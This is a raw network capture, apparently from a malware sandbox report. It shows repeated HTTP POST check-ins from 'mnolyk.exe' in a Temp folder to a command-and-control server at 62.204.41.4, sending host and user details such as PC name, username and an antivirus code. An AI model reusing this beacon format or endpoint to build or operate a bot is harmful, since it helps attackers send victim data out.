                                                        410192.168.2.55010062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:39.335819006 CET611OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:39.400489092 CET611INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        411192.168.2.55010162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:39.586155891 CET612OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:39.652388096 CET612INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        412192.168.2.55010262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:39.827580929 CET613OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:39.894838095 CET613INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        413192.168.2.55010362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:40.079576015 CET613OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:40.146662951 CET614INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        414192.168.2.55010462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:40.328929901 CET615OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:40.394458055 CET615INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        415192.168.2.55010562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:40.574553013 CET616OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:40.639194012 CET616INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        416192.168.2.55010662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:40.803738117 CET617OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:40.869002104 CET617INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        417192.168.2.55010762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:41.040652037 CET618OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:41.106904030 CET618INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        418192.168.2.55010862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:41.274400949 CET619OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:41.340738058 CET619INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        419192.168.2.55010962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:41.581873894 CET620OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:41.645371914 CET620INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        42192.168.2.54973262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:48.097239017 CET243OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:48.171710014 CET243INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        420192.168.2.55011062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:41.820358038 CET621OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:41.886085033 CET621INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        421192.168.2.55011162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:42.055399895 CET622OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:42.125121117 CET622INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        422192.168.2.55011262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:42.306782961 CET623OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:42.372473955 CET623INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        423192.168.2.55011362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:42.545396090 CET623OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:42.608891010 CET624INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        424192.168.2.55011462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:42.789843082 CET624OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:42.853933096 CET625INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        425192.168.2.55011562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:43.044125080 CET625OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:43.110388994 CET626INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        426192.168.2.55011662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:43.292412043 CET626OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:43.357706070 CET627INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        427192.168.2.55011762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:43.523915052 CET627OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:43.587764978 CET628INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        428192.168.2.55011862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:43.766871929 CET628OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:43.830147028 CET629INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        429192.168.2.55011962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:44.008779049 CET629OUTPOST /Gol478Ns/index.php HTTP/1.1
